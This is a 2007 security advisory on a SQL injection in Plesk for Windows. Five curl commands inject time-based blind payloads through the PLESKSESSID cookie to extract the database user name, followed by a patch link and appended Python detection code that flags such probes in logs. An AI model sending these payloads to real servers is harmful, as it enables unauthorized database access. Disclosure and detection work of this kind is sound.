HackerSafe Labs - Security Advisory
http://www.hackersafelabs.com

SWsoft Plesk for Windows - SQL Injection Vulnerability

Date: 9-11-07
Vendor: www.swsoft.com
Package: Plesk for Windows
Versions: v7.6.1, v8.1.0, v8.1.1, v8.2.0
Vendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3
Credit: Nick I Merritt

Risk:
Related Exploit Range: Remote
Attack Complexity: Medium
Level of Authentication Needed: Not Required
Confidentiality Impact: Major
Integrity Impact: Major
Availability Impact: Major

Overview:
SWsoft Plesk is a comprehensive control panel solution used by leading
hosting providers worldwide for shared, virtual and dedicated hosting.

Vulnerability:
A SQL injection vulnerability exists in the Plesk application. Please
see the following:

SQL Injection Page 1: "login.php3"
SQL Injection Page 2: "auth.php3"
SQL Injection Cookie Parameter: "PLESKSESSID"

Example: (Will extract the database user)

1) Delay=5224.3877
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

2) Delay=5165.3031
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

3) Delay=5158.9512
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

4) Delay=5224.0980
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

5) Delay=5241.5251
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

Solution: Apply the following patches - http://kb.swsoft.com/en/2159
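
Added example (not part of the original advisory, and not HackerSafe Labs
or SWsoft code): Python detection logic that flags PLESKSESSID values of
the shape shown above in proxy or WAF records and uses response times to
work out which characters the probes confirmed. The session-ID format, the
3000 ms cut-off, the record layout, the delay unit (ms) and all function
names are assumptions; the sample records are constructed from the
requests listed above.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate PLESKSESSID is a short alphanumeric token.
VALID_SESSID = re.compile(r"^[A-Za-z0-9]{1,64}$")
# Probe shape from the advisory: substring(col,pos,1)=char(code) gating BENCHMARK().
PROBE = re.compile(r"substring\(\s*(\w+)\s*,\s*(\d+)\s*,\s*1\s*\)\s*=\s*"
                   r"char\(\s*(\d+)\s*\).*?benchmark\(", re.I | re.S)
SLOW_MS = 3000  # assumed cut-off; the advisory's confirming requests took ~5200

def sessid(cookie_header):
    """Return the decoded PLESKSESSID value from a Cookie header, or None."""
    m = re.search(r"(?:^|;\s*)PLESKSESSID=([^;]*)", cookie_header)
    return unquote(m.group(1)) if m else None

def analyse(records):
    """records: (cookie_header, response_ms) pairs from a proxy or WAF log.
    Returns (alerts, leaked); leaked maps column -> {position: char} for
    probes slow enough to have confirmed the guessed character."""
    alerts, leaked = [], {}
    for cookie, ms in records:
        value = sessid(cookie)
        if value is None or VALID_SESSID.match(value):
            continue
        probe = PROBE.search(value)
        alerts.append((value[:32], "timing-probe" if probe else "malformed"))
        if probe and ms >= SLOW_MS:
            col, pos, code = probe.group(1), int(probe.group(2)), int(probe.group(3))
            leaked.setdefault(col, {})[pos] = chr(code)
    return alerts, leaked

def reconstruct(positions):
    """Join confirmed characters in position order; '?' marks unconfirmed ones."""
    return "".join(positions.get(i, "?") for i in range(1, max(positions, default=0) + 1))

def logged(pos, code):
    """Constructed log entry: the Cookie header of one request in the advisory."""
    return ("PLESKSESSID=1' union select if (substring(user,%d,1)=char(%d),"
            "BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" % (pos, code))

# Constructed sample: one normal session, one non-confirming probe, then the
# five requests and delays listed in the advisory (delays assumed to be ms).
SAMPLE = [("lang=en; PLESKSESSID=a3f9c0d1e5b7", 180.2), (logged(1, 98), 212.7),
          (logged(1, 97), 5224.3877), (logged(2, 100), 5165.3031),
          (logged(3, 109), 5158.9512), (logged(4, 105), 5224.0980),
          (logged(5, 110), 5241.5251)]

if __name__ == "__main__":
    alerts, leaked = analyse(SAMPLE)
    print(len(alerts), "suspicious requests;", {c: reconstruct(p) for c, p in leaked.items()})
```

The reconstructed string tells a responder which database account name the
requests disclosed, which scopes the credential review that follows patching.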